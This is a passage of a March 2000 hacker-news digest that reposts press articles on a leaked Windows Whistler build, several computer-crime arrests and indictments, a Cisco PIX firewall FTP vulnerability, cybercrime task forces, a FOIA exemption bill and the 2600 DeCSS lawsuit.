~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

While Windows 2000 only just recently shipped Microsoft is already working on the next generation of the operating system. Code named Whistler, build 2211.1 has been liberally spread around pirate sites across the net.

Beta News
http://betanews.efront.com/article.php3?sid=953595359

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2471310,00.html?chkpt=zdnntop

Beta; Whistler Hits the Web

By Nate Mook, eFront
March 20th, 2000, 6:35 PM

An internal build of Microsoft's future operating system, set to combine consumer and business versions into a product currently codenamed Whistler Windows 2001, has leaked out onto the Internet.
Build number 2211.1 was posted onto various college and Internet sites early this morning and spread as per usual, like wildfire.

While the new operating system currently looks almost identical to Windows 2000, a number of people who installed the leaked build stated there were a few HTML enhancements to folders, simplifying things for novice users. For example, the control panel is now by default an HTML interface, offering access to a few basic configuration options.

Whistler does contain the infamous MarsCore.DLL file which started rumors last month regarding the purpose of Mars, now known to be part of the future version of Microsoft's MSN client. However, it is unknown whether or not the new HTML folders are part of the Mars core or if users will be given the opportunity to switch off more user friendly parts of the operating system.

As usual with an early Alpha release, most new features and enhancements will not be added until Beta 1. Keep checking back for continued coverage regarding Microsoft Whistler.

ActiveWin contributed to this report.

-=-

ZDNet; Windows 2001 leaked on the Web

A pirated version of Windows 2001 is winding its way across the Net. And it looks a lot like today's Windows.

By Mary Jo Foley, ZDNet News
UPDATED March 21, 2000 2:03 PM PT

Microsoft Corp.'s next full-fledged version of Windows, code-named Whistler, is at least a year away from release -- but already a pirated version of one of the latest builds has found its way onto the Net.

As reported by the Windows enthusiast sites ActiveWin and BetaNews, a recent internal build of Whistler has been posted illegally to a number of college and Internet sites. ActiveWin and BetaNews are reporting that Build 2211.1 was posted Tuesday morning and "spread as per usual, like wildfire."

Whistler is the code name for the first full-fledged upgrade to Windows 2000 that will be based on the Windows NT kernel, rather than the Windows 9X kernel.
(The Windows 9X update is code-named Millennium and expected to ship in the third or fourth quarter of this year.) Whistler is tentatively slated to ship in March 2001, according to internal Microsoft documents.

Microsoft (Nasdaq: MSFT) won't comment on where Whistler is in the development process. But sources close to the company say the latest "stable" internal developers build is numbered 2207. The most recent internal test build is 2214, sources add.

A Microsoft spokesman said the company was investigating reports of pirated Whistler builds but would make no further comment.

Looks like Win2000 -- so far

As noted by ActiveWin, the pirated Whistler build looks almost identical to Windows 2000 Professional. "A number of people who installed the leaked build stated there were a few HTML enhancements to folders, simplifying things for novice users," ActiveWin reported. "For example, the control panel is now by default an HTML interface, offering access to a few basic configuration options."

One change under the hood, according to ActiveWin, is the inclusion of the MarsCore.DLL file. "Mars" is the code name for user interface technology slated to be included in a future version of Microsoft's MSN client. At one point, Mars was used as the code name for the next version of a consumer-oriented version of Internet Explorer.

After signing up Mars beta testers last fall, Microsoft sent out a note telling testers it had delayed the start of the beta because the company was "rethinking some of our most basic assumptions" regarding the future user interfaces.

It isn't just in the user interface that Microsoft has been redrawing its Windows road map. In January, Microsoft acknowledged that it had tabled work on "Neptune," a consumer version of Windows slated to follow Millennium, and on "Odyssey," an NT-kernel-based follow-on to Windows 2000. Instead, Microsoft said, it planned to merge the Neptune and Odyssey code bases in the form of Whistler.
The follow-on to Whistler, code-named Blackcomb, is expected to ship in 2002 or later.

@HWA

59.0 HNN:Mar 22nd:Toronto Business Held For Extortion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

An unnamed business in the Toronto area was held for ransom of less than $5,000 after a 14 year old youth took control of the company's chat-room and email servers. Police arrested the individual after arranging a meeting to deliver the money. The youth has been charged with extortion, mischief to data, fraudulently possessing a computer password, production and possession of counterfeit money, and two counts of unauthorized use of a computer. (And they say there are not enough computer crime laws.)

National Post
http://www.nationalpost.com/news.asp?f=991222/158060&s2=national&s3=news

Wednesday, December 22, 1999

14-year-old computer whiz charged after company given extortion demand

Arrested in Keswick

Chris Eby
National Post

A 14-year-old computer whiz, who allegedly hacked into the accounts of a downtown Toronto business and tried to extort the owners, was charged yesterday with a raft of extortion and counterfeiting-related offences after a police sting operation.

The boy, who cannot be named under the Young Offenders Act, took control of the business's e-mail and chat rooms -- two operations vital to the business' survival -- for two weeks. He contacted the owner of the business through the Internet, demanding cash before he returned control of the accounts.

"He obviously displays a capability in computers that appears to be above average," said Detective Myron Demkiw. "They're pretty serious offences ... this is all relatively new ground for everybody."

The owner of the business contacted police, who traced the suspect to Keswick, a town 60 kilometres north of Toronto.
Investigators arranged a meeting on Monday where the suspect was supposed to receive the money he was demanding (a sum less than $5,000 was all police would say), and was arrested.

"He was calm throughout," Det. Demkiw said of the youth.

As a result of the investigation, detectives executed a search warrant on the boy's home and seized his computer, related documents, and some counterfeit money.

When asked if he had ever come across anything like this, Det. Demkiw replied: "No, never, and this will be something new to the courts as well."

The youth has been charged with extortion, mischief to data, fraudulently possessing a computer password, production of counterfeit money, and two counts each of unauthorized use of a computer, and possession of counterfeit money.

@HWA

60.0 HNN:Mar 22nd:Is the Census Secure?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The long form of the US Census has sparked privacy concerns ever since it was introduced in 1960. With the increased awareness of computer security and identity theft those fears are even greater. Some residents fear giving out their personal information on the off chance that it may be stolen or otherwise fall into the wrong hands. The Census Bureau has taken some solace in the fact that it has never suffered a computer related break-in.

Philadelphia Inquirer
http://www.phillynews.com/inquirer/2000/Mar/21/front_page/PCENSUS21.htm

Census queries raising computer-security questions

New inquiries strike some as an opening to hackers or invasions of privacy. Bureau officials say fears could reduce responses.

By Thomas Ginsberg
INQUIRER STAFF WRITER

Betty McAdams is afraid computer hackers could steal her personal information. Joe Alessandroni figures marketers somehow will buy his. Entire Web sites question the government's right to the data at all.
In the last two weeks, about 15 million Americans began receiving the most intrusive government questionnaire most will ever fill out. The "Long Form" from the U.S. Census Bureau - 37 pages filled with 53 questions about everything from language skills to toilets - is prompting some recipients to squeal about invasion of privacy, a complaint that has arisen every decade since the long form was launched in 1960.

This year, however, Census officials and privacy experts said they detect a more pointed fear: concern about computer security. The growth of the Internet since the 1990 Census along with high-profile attacks on Web sites such as Yahoo have exacerbated already-rising concerns about the safety of any information on any computer anywhere.

"Alarmed is a good word," said McAdams, 51, of Philadelphia, an assistant director of Greater Philadelphia First, an alliance of business executives in the region. "I assume they're going to compile all this information on a computer somewhere. . . . Probably if [computer hacking] had not happened so recently, I might not be as alarmed."

To increasing numbers of people, the country is facing a "privacy Chernobyl," said Robert R. Belair, a Washington-based privacy lawyer and editor of a national newsletter on business privacy. "It doesn't surprise me that the Census Bureau is going to have more trouble this year than before."

Unfortunately, some salient facts get lost in the din: The Census Bureau has never suffered a computer-related security breach, experts agree. Its computers are kept separate from other government systems, and respondents' names are separated from personal data when the results are eventually compiled into databases, Census officials say. Moreover, since the 1930s, the Census Bureau, backed by the U.S. Supreme Court, has jealously guarded its records; in 1942, it even rebuffed a demand from the U.S. War Department for information on potential draftees.
Census officials, for their part, take the once-a-decade privacy complaints in stride as they collect the statistics for use in redrawing congressional districts and determining federal funding formulas. Questions about household income, for example, are used to estimate the number of subsidized lunches the neighborhood school might have to provide. This year's new question about whether a resident provides primary care for a grandchild is linked to welfare allocations.

Maury Cagle, a bureau spokesman, said that even though the agency's confidentiality record is clean, "people have an ingrained suspicion about computers and private information. All of those things add to the falling response rate."

The Census Bureau projects its response rate for the 2000 Census will hit its lowest level ever: 61 percent, down from 75 percent in 1980. As the response rate drops, the government has to hire ever more head-counters - "enumerators," in bureau jargon - to brave back streets and barking dogs to get the information personally. This year, the Census Bureau is mounting a $230 million outreach campaign designed to raise the response rate and keep down the expense of enumerators.

Still, "people are a little more testy" about giving out personal information than in years past, said Gorden DeJong, director of Pennsylvania State University's Population Research Institute. DeJong and others blame everything: a spate of high-profile computer attacks; rising concerns about confidentiality; a constant if sometimes fluctuating distrust of government; and an ever-widening flood of private surveys and junk mail with which Americans already contend.

"For the number of things I get in the mail, I already must be on 50 lists," said Alessandroni, 84, a retired lawyer from Philadelphia. "It's pretty obvious to me that there's no such thing as secrecy. . . . The information is bound to get around."
In the last two weeks, either the long form or a separate three-page short form was mailed to 113 million households. An additional 22 million households with incomplete addresses or post office boxes were having their forms hand-delivered. Households that don't return the form by April 1 may get a visit from an enumerator.

Every sixth household got a long form. The ratio was set by a scientific sampling formula, and people may not fill out a long form unless they were selected, said Phillip Lutz, assistant regional manager for the Census region comprising Pennsylvania, New Jersey, Maryland, Delaware, and Washington.

Each form arrives bearing the bold-faced words: "Your Response is Required by Law." What is not written is the fact that the $100 fine for failing to respond - a fine dating to at least 1954 - apparently has not been imposed in decades, even though federal courts have upheld the constitutionality of the participation law.

"We're not interested in fining people. We're interested in collecting information," Lutz said.

Still, some people are willing, even eager, to pay the fine rather than give up personal information.

"I wrote the number of people living in my house and enclosed a $100 check," said a 41-year-old participant in an Internet chat room about the Census, who spoke on condition that only his first name, Greg, be printed. "Why is it any of their business how I am paying or have paid for my home?"

So far, the refusers appear to be in the minority. State and local officials across the country have joined with community and immigrant groups to push for full participation, arguing that the sacrifice pays off in federal funding. Pennsylvania officials have estimated that each person counted in Philadelphia is worth an average of $2,200 in federal funds.

"The very people who are not participating need to be counted so they can have government services in their neighborhood," said Kate Kunda, 45, a Spanish teacher from Wayne, Delaware County.
As for herself, Kunda added: "I was annoyed that they wanted to know about my electricity bill and mortgage, but we did make an effort to fill it out."

@HWA

61.0 HNN:Mar 23rd:Insurance Co. Reveals Personal Info on Web
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse

A software glitch allowed visitors to Selectquote.com to view the personal information of the previous visitor. At least 20 users had everything from name and address to current insurance coverage and parents health histories revealed.

MSNBC
http://www.msnbc.com/news/385464.asp?0m=T12R

Insurance site exposes personal data

Glitch on Selectquote site reveals information to next user

By Mike Brunker
MSNBC

March 22 — Consumers who requested online life insurance quotes from Selectquote.com on Tuesday and Wednesday got more than they bargained for: Thanks to a software glitch, their personal information was left on the company's Web site for the next user to see.

THE PROBLEM occurred when a form that consumers fill out to request a quote failed to clear the contents at the end of the process. This left everything from the previous user's name and address to information on current coverage and parents' health histories plainly visible to the next person to request a quote.

Lyle Griffin, a spokesman for Selectquote, said the problem occurred when programmers fixed a piece of code on the site that was causing a problem for users with an older version of Internet Explorer. Unfortunately, the fix created a problem in the quote request form, he said.

The problem lasted from 4 p.m. PT on Tuesday until about 10 a.m. PT Wednesday, but it affected only about 20 users who were directed to a newly designed Selectquote site that is still being tested, Griffin said.

"Not to minimize it," he said of the problem. "Obviously this is extremely embarrassing."
MSNBC.com was alerted to the problem late Tuesday by a prospective Selectquote customer, who was outraged that other visitors to the site were able to view her personal information.

"About 10 minutes (after filling out the form) I got a call from a woman in Ohio who said, 'I'm just someone who's on Selectquote and all your information is prepopulated in the questionnaire,'" said Ona Karasa of Bellevue, Wash.

She said she went back on the site Wednesday morning and saw the information of two other people who apparently had just requested life-insurance quotes using the online service. MSNBC editors also were able to access personal information entered by other users until midmorning Wednesday.

Another user, Richard Underwood of Rockville, Md., said he was alerted to the problem early Wednesday by e-mail from another Selectquote surfer. He said a company representative had called and left a message concerning his request for a quote, but did not mention the Web site problem.

"Truthfully, I don't know if I want to talk to anyone at Selectquote about life insurance at this point," he said.

Underwood said the experience would likely make him pause the next time he is prompted to enter personal information on a Web site.

"I was just getting to the point where I was reasonably comfortable doing that, but I may have to think twice if this is how it works," he said.

@HWA

62.0 HNN:Mar 23rd:Cisco Admits to Big Hole in PIX Firewall
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse

Last week Cisco admitted that it is possible to fool the PIX stateful inspection into opening up arbitrary TCP ports, which could allow attackers to circumvent defined security policies. The vulnerabilities affect any PIX firewall that has enabled FTP, which is turned on by default.
Vnunet
http://www.vnunet.com/News/601083

Cisco admits to serious PIX firewall flaw

John Leyden, Network News [22 Mar 2000]

Cisco last week admitted that two security vulnerabilities affecting its PIX firewalls could leave corporate networks open to attack.

In an interim security notice, the vendor acknowledged the existence of two related vulnerabilities that both cause its Secure PIX Firewalls to interpret FTP (File Transfer Protocol) commands out of context, leaving the networks behind the firewalls open to penetration.

Cisco said that in certain configurations "it is possible to fool the PIX stateful inspection into opening up arbitrary TCP ports, which could allow attackers to circumvent defined security policies".

All Cisco Secure PIX Firewalls with software versions up to and including 4.2(5), 4.4(4), and 5.0(3), that are configured to provide access to FTP services, are at risk from both vulnerabilities.

Cisco admitted that the problem means any Cisco Secure PIX Firewall that has enabled the fix-up protocol FTP command could allow unauthorised data to reach the network it is designed to protect.

Deri Jones, managing director of security tester NTA Monitor, described the issue as "serious", particularly because Cisco's offering is currently the third most popular firewall in the market.

"To Cisco's credit it has issued a bulletin, but has not yet found any solutions. This will not be trivial to address and may take it some time," warned Jones.

Clive McCafferty, managing director of security consultant CenturyCom, said that many users, which include BT, use Cisco's PIX firewalls for managed services. "This could allow an attacker to send spurious stuff and then launch an attack when a port is open," said McCafferty.

The first vulnerability, which remains unfixed, is exercised when a client inside the firewall browses to an external server and selects a link that the firewall interprets as two or more FTP commands.
The client begins an FTP connection as expected, and at the same time unexpectedly executes another command opening a separate connection through the firewall. The only solution Cisco currently suggests for this problem is disabling incoming FTP services. Any server that permits internal clients to make arbitrary outbound FTP connections may be vulnerable to this issue. The second, related problem is exercised when the firewall receives an error message from an internal FTP server containing an encapsulated command that the firewall interprets as a distinct command. This can be exploited to open a separate connection through the firewall. Both vulnerabilities are due to the command fix-up protocol FTP (portnum), which is enabled by default on the Cisco Secure PIX Firewall. To exploit the security flaws, attackers must be able to make connections to an FTP server protected by the PIX Firewall. @HWA 63.0 HNN:Mar 23rd:College To Offer Online Crime Fighting Courses ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Lew A new state-of-the-art computer lab was unveiled by officials at the College of DuPage in Illinois on Monday at the college's Suburban Law Enforcement Academy. The lab will offer police officers (no civilians allowed) courses in reconstructing an electronic crime scene, as well as how to present such evidence in court. The lab, valued at $250,000, was donated by Microsoft Corp. and Omni Tech Corp.
Chicago Tribune - Registration Required http://chicagotribune.com/news/metro/dupage/article/0,2669,SAV-0003210202,FF.html @HWA 64.0 HNN:Mar 23rd:Pittsburgh Gets Computer Crime Task Force ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse and Evil Wench A joint operation of federal and local authorities named the Pittsburgh High Tech Computer Crimes Task Force will try to help in the fight against cyber crime. The Task Force was announced on Tuesday at the Pittsburgh FBI offices. Pittsburgh Tribune http://www.triblive.com/digage/dfbi0323.html Pittsburgh Post Gazette http://www.post-gazette.com/regionstate/20000322cybercrime1.asp Tribune; FBI installs new task force aimed at fighting cybercrimes By Erik Siemers TRIBUNE-REVIEW The aqua Macintosh G3 computer, its electronic guts exposed, appeared harmless as it sat on a table in the Pittsburgh FBI offices Tuesday. But its hard drive tells investigators a different story - it was used to print counterfeit corporate checks. That Macintosh is one of the computers under examination by the Pittsburgh High Tech Computer Crimes Task Force. The medley of federal and local authorities trained to investigate computer-related crimes was unveiled yesterday. The task force, one of the first in the nation, pools experts from local agencies such as Pittsburgh police with federal agencies such as the Secret Service and the Internal Revenue Service into one room to combat the rapid growth of cybercrimes. "Crimes we couldn't have conceived years ago are now routine," said U.S. Attorney Harry S. Litman, whose office is involved in the task force. "It is critical that we respond to these crimes by marshaling our resources." Western Pennsylvania is open to crimes such as hacker attacks and "a whole array of Internet fraud," partly because it has more software development firms than Silicon Valley, Litman said.
"Our position poses significant vulnerability to cybercrimes," Litman said. The task force will be free to use each agency's resources along with those at Carnegie Mellon's Computer Emergency Response Team, said Richard D. Pethia, manager of CERT's networked systems survivability program. CERT will provide technical assistance to the task force, Pethia said. Each agency offers one representative to the task force who has been trained in forensic examinations of computers, said Dan Larkin, supervisor in charge of the FBI's White Collar and Computer Crimes Division. Aside from providing intelligence and technical assistance to computer investigations, the task force will focus on investigations where the Internet was used as the main tool in committing the crime. Michael Vatis, director of the FBI's National Infrastructure Protection Center in Washington, D.C., said all FBI field offices will eventually house task forces similar to Pittsburgh's. Pittsburgh is one of the initial task force sites partly because "we have a wealth of talent," said John P. Joyce, assistant special agent in charge of the FBI's Pittsburgh office. The city also has a good track record for law enforcement agencies working with each other and with Carnegie Mellon's technology resources, said FBI Special Agent Bill Crowley. Task force members will use traditional investigation skills along with advanced knowledge of technology to crack computer cases, said Vatis. "We need to have the technology to get the digital evidence," Vatis said. Getting that digital evidence can be as simple as copying the contents of the hard drive for analysis on its own computers, said Special Agent Tom Hyslip, the Secret Service's representative to the task force. "When we go to court we can say we never touched (the evidence)," Hyslip said. 
-=- Gazette; City at forefront of war on cybercrime FBI forming task forces to fight crimes of Internet age Wednesday, March 22, 2000 By Torsten Ove, Post-Gazette Staff Writer With its aging population and Rust Belt image, Pittsburgh may hardly seem like the kind of town the federal government would choose as a base for its war on sophisticated cybercrime. But yesterday, as local law enforcement officers stood stiffly for the cameras at FBI headquarters Downtown, authorities announced the creation of the nation's first task force specifically designed to combat computer intrusion, Web site vandalism, on-line espionage and other crimes of the rapidly evolving Internet age. "This is the future, but it is also very much the present," said Michael Vatis, the FBI's top cybercop. "This is putting Pittsburgh at the cutting edge of cybercrime prevention." The task force, comprised of federal, state and local agencies, is one of 16 planned nationwide in major cities. Pittsburgh was chosen because of the prevalence of software development companies here and the presence of Carnegie Mellon University's Computer Emergency Response Team, the nation's leading cybercrime research facility. In addition to focusing on complex computer and Internet crimes, FBI officials said the local task force will provide technical assistance to police departments in investigations of fraud, child pornography and identity theft that involve computers. Vatis, director of the National Infrastructure Protection Center in Washington, D.C., said computers are changing the face of crime so quickly that law enforcement agencies have to work together to keep up. 
In addition to working to combat large-scale attacks such as the one that disabled Yahoo!, eBay and other e-commerce Web sites last month, federal authorities have been scrambling to head off all manner of computer crimes, from organized hacking of government computers by suspected foreign agents to amateur vandalism such as that committed by the teen-ager who vandalized an anti-drug Web site with pictures of Beavis and Butthead. Locally, FBI Special Agent John P. Joyce said his agency is investigating 30 to 40 cases of computer intrusion and similar crimes, although he wouldn't reveal details of any of them. Because of their technical nature, each investigation requires much more expertise than the traditional capers tackled by FBI agents of old. The new breed of federal crime fighter is more likely to be an agent sitting at a computer all day than a suit-and-tie swashbuckler with a gun kicking down doors. "These cases are a lot more complicated than physical crime," said Vatis, "and they take a longer time to solve." Richard D. Pethia of CMU's CERT warned that the "denial of service" attacks that knocked the Internet companies off-line in February are only the beginning of new waves of cyberspace assaults. In 1998, he said, his center examined 4,000 incidents. Last year, the number reached 8,000. This year, it could double again. "This problem is real and it's here," he said. "The nasty thing about computer attacks is that they can be launched from anywhere on the planet." And it can be nearly impossible to track down the culprits and then prove they are responsible for specific on-line exploits. The attacks on the e-commerce companies, for example, remain unsolved, although Vatis said the FBI is making progress in the case. Not everyone is convinced the federal government, working with experts in the private sector, has what it takes to match wits with serious hackers bent on mayhem. 
"If I were a cyber criminal with the FBI after me, I would sleep like a baby," said Jay Valentine, president of InfoGlide Corp., an Internet security company, in a recent Scripps Howard report about Internet security. "Even a blind squirrel finds a nut, but the FBI will only catch amateurish hackers. The best ones are a generation ahead of the FBI." Other critics have blasted the FBI and the National Infrastructure Protection Center for reacting too slowly to the attacks on 30 university systems last year that laid the groundwork for the e-commerce shutdown last month. In a USA Today report, experts -- many of them cybersleuths selling their services -- also said the government's efforts were hindered by inter-agency squabbling and the fact that some companies don't trust the FBI enough to share information with agents. Vatis wouldn't address the USA Today report except to say that it was inaccurate. Regarding the charge of slow government reaction, he said the protection center issued a warning about the denial-of-service threat in plenty of time. The National Infrastructure Protection Center's Web site shows the warning went out on Dec. 30 and included detailed information about what defensive steps to take. Still, Vatis acknowledged that government agencies are "still in the process of getting up to speed." @HWA 65.0 HNN:Mar 23rd:Business May Be Protected Against FOIA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse To encourage companies to release information about online attacks a new bill would provide firms with an exemption to the Freedom of Information Act. Representatives Tom Davis, R-Va. and Jim Moran, D-Va. plan to introduce the bill later this week. It is hoped that this exemption will promote the reporting of cyber attacks by industry. (And at the same time erode citizens rights.) 
Newsbytes http://www.newsbytes.com/pubNews/00/146086.html Bill Would Protect Firms That Share Hacking Info By David McGuire, Newsbytes WASHINGTON, DC, U.S.A., 21 Mar 2000, 6:00 AM CST A new bill aimed at encouraging companies to share information about hacker attacks would provide firms with a limited exemption from the Freedom of Information Act (FOIA). Set to be introduced by Reps. Tom Davis, R-Va. and Jim Moran, D-Va., later this week, the legislation would allow companies to share information about cyberattacks with law enforcers and industry groups, without worrying that such information could come back to haunt them, Davis staffer David Marin said today. "The public interest will be served by companies coming forth to share their information" about attacks, Marin said. Too often now companies do not report cyberattacks for fear that such reports will find their way into the media, he said. While the bill would create a limited shelter under FOIA, it is not intended to allow companies to mask their business dealings, Marin said. When the legislation is completed it will be "narrowly tailored to address (information pertaining to) how the attack was done and what was done to fix the attack," Marin said. The legislation will apply only to telecommunications and information technology infrastructure attacks. Used primarily by the media, FOIA allows members of the press and the public to file legally binding requests for public documents. FOIA already contains an exemption for ongoing criminal investigations, but Davis and Moran are aiming to further protect firms that divulge information about cyberattacks, Marin said. Reported by Newsbytes.com, http://www.newsbytes.com .
@HWA 66.0 HNN:Mar 23rd:Teenagers To Receive Deterrent Sentences ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse After selling stolen logon names and passwords three teenagers in Hong Kong were warned by Magistrate Ian Candy that they faced deterrent sentences. The three pleaded guilty to a total of 49 charges including the downloading and selling of music files. Sentencing has been scheduled for April 5th. South China Morning Post http://www.technologypost.com/features/Daily/20000322105804432.asp?Section FEATURES Teen hackers face deterrent sentences ELAINE PAK LI Three teenage computer hackers were warned yesterday that they faced deterrent sentences after they admitted selling login names and passwords stolen from the Internet in the first case of its kind in Hong Kong. One of the trio, a student, was also convicted of downloading songs from the Internet and selling them for profit. At Eastern Court, restaurant manager Tam Hei-lun and clerk Po Yiu-ming, both 19, and student Mak King-lam, 18, pleaded guilty to a total of 49 charges. Magistrate Ian Candy remanded them in custody for sentencing on April 5, pending reports, and said: "It is precisely these kinds of computer crimes which leave Internet users in fear and make them pause before conducting even the most basic of transactions. "These criminal activities should be nipped in the bud and a deterrent sentence must be imposed." All the offences took place between March 1998 and May last year. David Leung, prosecuting, told the court Po had hacked into other Internet users' computers and unlawfully obtained 127 login names and passwords given to Internet users when they subscribe to an Internet service provider for a monthly fee and an hourly rate. The three defendants knew each other through the Internet and Po had sold some of his illegally obtained login names and passwords to Tam for $3,000, but gave others for free to Mak.
Tam later resold them for $1,500. The three were aware that the information they obtained was acquired illegally, the magistrate was told. Mr Leung said the three defendants had hacked into the accounts of Internet users of Hongkong Telecom IMS Netvigator, Vision Network Ltd, City Telecom (HK), Netfront Information Technology and ABC Net, saving themselves the monthly fees and causing losses to the account holders. Tam admitted 14 counts of obtaining access to a computer with a view to dishonest gain, Po admitted 12 and Mak two. Mak also admitted 10 charges of selling pirated discs, in which he downloaded songs from the Internet and sold 200 discs from his own Web site. Each disc contained 100 songs and was priced at $88. Tam, who asked buyers of the logins to deposit money into his bank account, also admitted eight counts of dealing with property known or reasonably believed to represent proceeds of an indictable offence. Po admitted a further three charges of criminally damaging the computers of three users. @HWA 67.0 HNN:Mar 24th:2600 Retains Big-name Attorneys - Trial Date Set ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Macki Martin Garbus, an internationally distinguished New York attorney, and his firm (Frankfurt, Garbus, Klein, and Selz) have been retained by the defense in the New York MPAA DeCSS case. Two of the three defendants have withdrawn under consent agreements, leaving only 2600 Magazine and its publisher Emmanuel Goldstein, as defendant. A trial date has been set for December 5, 2000. 2600 Electronic Frontier Foundation - They are providing funding, please show your support!
http://www.2600.com/news/2000/0324.html http://www.eff.org TRIAL DATE SET IN DECSS CASE - WORLD RENOWNED LEGAL TEAM TAKES CASE 03/24/00 The importance of the fight against the MPAA and the DVD Copy Control Association was underlined this week with the hiring of the legal team of Frankfurt, Garbus, Klein, and Selz to represent 2600. Martin Garbus, who will be the key lawyer on our side, has defended the likes of Lenny Bruce, Spike Lee, Samuel Beckett, Andrei Sakharov, and Vaclav Havel and is the author of "Tough Talk," published in 1998. He is a renowned First Amendment attorney and, thanks to funding from the Electronic Frontier Foundation, we have him in our court. Please show your support to the EFF for taking on this important case and help them to play a key role in whatever cases come up in the future. We've already seen a significant development this week as we have been granted the time we need to build our defense. The court was prepared to start the trial on May 1st which is what the plaintiffs wanted. After presenting our arguments, we were given a court date of December 5th. This is a very good development for us as there is much to be prepared. An uninformed court would have been bad for all of us. As the weeks and months progress, we will be in need of expert witnesses and testimony supporting our position. Your help and support will be invaluable as always. We will keep you updated as events progress. @HWA 68.0 HNN:Mar 24th:Max Vision Indicted in San Jose ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by McIntyre A suspect in computer break-ins at NASA and the U.S. departments of energy, defense and transportation was indicted in San Jose on Wednesday. The indictment of Max Vision (Max Ray Butler) of Berkeley included charges of unauthorized access of a computer, recklessly causing damage and interception of electronic communication for a total of 15 counts.
Max Vision was previously an FBI informant who turned himself in on Tuesday. Associated Press - via Yahoo http://dailynews.yahoo.com/h/ap/20000323/us/hacker_indicted_1.html Wednesday March 22 11:56 PM ET Suspected Gov't Hacker Indicted SAN FRANCISCO (AP) - A suspected computer hacker made his first court appearance Wednesday after being indicted on charges of breaking into computers belonging to NASA and the U.S. departments of energy, defense and transportation, said federal prosecutors. Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during the hearing in San Jose. On March 15, he was indicted on 15 criminal counts, including unauthorized access of a computer, recklessly causing damage and interception of electronic communication. All the counts carry sentences of at least six months and fines of hundreds of thousands of dollars. Butler, who also goes by the name of Max Vision, had been an FBI source, helping agents solve computer crimes, authorities said. He turned himself in on Tuesday. Butler's attorney did not return a telephone call seeking comment. -=- More: (SfGate) http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/03/24/MN57003.DTL FBI Computer Expert Accused of Hacking Henry K. Lee, Chronicle Staff Writer Friday, March 24, 2000 Max Ray Butler seemed to be at the top of his game. For two years, the computer expert was a confidential source for an elite FBI computer crime squad, helping to ferret out scofflaws on the Internet. Butler, also known as Max Vision, was also a self-described ``ethical hacker'' from the Silicon Valley who boasted that he could test the security of any computer system by penetrating it. But Butler's cyber activity went too far, federal authorities say. 
Butler, 27, of Berkeley appeared in federal court in San Jose yesterday on a 15-count federal indictment charging him with hacking into computers used by the University of California at Berkeley, national laboratories, federal departments, air force bases across the country and a NASA flight center. Butler posted $50,000 cash bail yesterday after U.S. Magistrate Judge Patricia Turnbull ordered him not to use computers except for work. Butler and his attorney, Jennifer Granick of San Francisco, could not be reached for comment. The indictment, handed down March 15, said Butler caused ``reckless damage'' as a result of intrusions in May 1998. Butler was also charged with possession, with intent to defraud, of 477 passwords belonging to customers of a Santa Clara-based Internet service provider. The case underscores the potential risks involved when law-enforcement agencies use confidential informants with access to sensitive information. ``Sources are often very close to criminal activity, and sometimes they cross the line,'' said Special Agent George Grotz, an FBI spokesman in San Francisco. Grotz declined to say how Butler became an FBI informant and whether he was a federal source at the time of the alleged crimes. Grotz said Butler is no longer associated with the agency. Friends of the suspect told the Associated Press that Butler was caught possibly violating the law several years ago and began working with the FBI to avoid charges. Seth Alves, 27, told the news agency that Butler was unfairly targeted after refusing to comply with an FBI request. A 22-month investigation by the FBI and military investigators ended Tuesday morning when federal agents converged on a home on Dwight Way near the UC Berkeley campus, where Butler lives with his 23-year-old wife, Kimi Winters. No one answered the door. Butler turned himself in to the FBI in Oakland later that day.
Butler grew up in Idaho and lived with his family in Washington, where authorities said he has a 1997 misdemeanor conviction for attempted trafficking of stolen property. He developed a proficiency with computers, eventually attracting the attention of the FBI's Computer Crime Squad, which used him as a confidential informant. An FBI search warrant affidavit said Butler was ``well known'' to squad members and ``has provided useful and timely information on computer crimes in the past.'' In 1997, Butler started a company known as Max Vision in Mountain View, specializing in ``penetration testing'' and ``ethical hacking'' procedures in which he would simulate for clients how a hacker would penetrate their computer systems, according to the company Web site. ``Our client penetration rate is currently 100 percent,'' the site said, with recent clients including a large consortium of telecommunications companies, a major motion picture company and an e-commerce online auction service. By 1998, Butler was living with Winters in a one-story San Jose apartment, where the couple started up their own Web-design company, Kimi Networks, records show. Reached by telephone yesterday, Winters hung up on a Chronicle reporter. It was also from that apartment, according to the FBI, that Butler hacked into computers by using a computer software vulnerability known as a buffer overflow, which sends commands into a system that ordinarily would not be allowed. Butler also allegedly invaded computers used by the Lawrence Berkeley National Laboratory. Vern Paxson, a computer scientist at the lab, noticed an online intruder conducting unauthorized scans of laboratory and UC Berkeley computers in May 1998 and used a monitoring device that later helped identify the source of the intrusions. 
